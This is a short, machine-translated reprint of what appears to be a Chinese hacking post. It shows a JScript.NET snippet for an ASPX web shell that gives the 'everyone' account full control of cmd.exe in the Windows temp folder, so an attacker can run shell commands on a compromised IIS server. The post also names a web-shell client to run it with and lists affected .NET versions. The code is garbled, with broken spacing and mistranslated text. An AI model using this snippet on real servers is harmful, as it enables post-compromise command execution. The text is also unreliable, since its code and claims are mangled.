Try{varStrpath:string ="C:\\windows\\temp\\cmd.exe", struser:string ="everyone";varDirinfo:System.IO.DirectoryInfo =NewSystem.IO.DirectoryInfo (strpath);varDirsecurity:System.Security.AccessControl.DirectorySecurity =Dirinfo. GetAccessControl ();d irsecurity. Addaccessrule (NewSystem.Security.AccessControl.FileSystemAccessRule (struser, System.Security.AccessControl.FileSystemRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));d Irinfo. Setaccesscontrol (dirsecurity); Response.Write (strpath+"\ t permissions added successfully!");}Catch(x) {Response.Write (x.message);}
Save as CMD.CCC, use kitchen knife self-written script run can break
The affected versions are:
Microsoft. NET Framework 2.0
Microsoft. NET Framework 3.5
Microsoft. NET Framework 3.5.1
Microsoft. NET Framework 4
Microsoft. NET Framework 4.5
Microsoft. NET Framework 4.5.1
Conditions of Use:
1. aspx is required and is higher than the Microsoft. NET Framework 1.14 Version
2. Except for Safe mode (there is no way to break the. NET security model now)
Vulnerability Description: This vulnerability can directly give the file permissions (to let the files do not have permission)
Article reprinted from: http://www.xlgps.com/article/39438.html
Aspxshell execute cmd under no writable executable directory